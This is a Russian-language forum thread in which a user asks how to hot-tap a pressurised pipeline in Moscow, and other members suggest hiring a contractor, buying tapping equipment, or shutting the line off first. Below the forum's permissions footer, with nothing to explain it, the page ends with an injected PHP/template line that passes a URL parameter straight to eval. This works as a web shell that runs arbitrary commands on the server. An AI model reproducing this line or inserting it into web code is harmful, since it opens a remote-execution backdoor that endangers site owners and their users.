+ Ответить в теме
Показано с 1 по 4 из 4

Тема: Трубопровод


  1. #1
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45

    Трубопровод

    У нас производство, которое скоро будет запущено, вот и заканчиваем подготовку производственной площадки. На данный момент нужно осуществить врезку в трубопровод, который находится под давлением. Кто-то в Москве осуществлял такое? Где брали оборудование для врезки? Трубы и арматура тоже интересуют.

  2. #2
    Мимо проходил Agatangel is on a distinguished road Аватар для Agatangel
    Регистрация
    07.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    28
    Мне кажется, фирмы, которые могут осуществить врезку, должны быть в каждом городе. В данный момент в Москве вы тоже сможете найти такие фирмы.

  3. #3
    Мимо проходил Добродел is on a distinguished road Аватар для Добродел
    Регистрация
    30.06.2020
    Откуда
    Мой адрес не дом и не улица
    Машина
    Лучшее
    Сообщений
    15
    Оборудование для врезки в трубопроводы под давлением можно здесь купить https://mtools.ru/catalogy/oborudova...otklyucheniya/ Но вы пока не спешите этого делать. По моему, фирмы, которые занимаются врезкой, должны иметь такое оборудование. Так что, найдите пока хоть кого-то, кто занимается такого рода работами, и уточните у них.

  4. #4
    Мимо проходил Малой is on a distinguished road Аватар для Малой
    Регистрация
    28.05.2020
    Откуда
    свой город
    Машина
    красный
    Сообщений
    24
    А непременно нужно осуществлять врезку под давлением? Мне кажется, лучше как-то предварительно отглушить трубопровод, а потом уже в него врезаться. Так удобнее.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}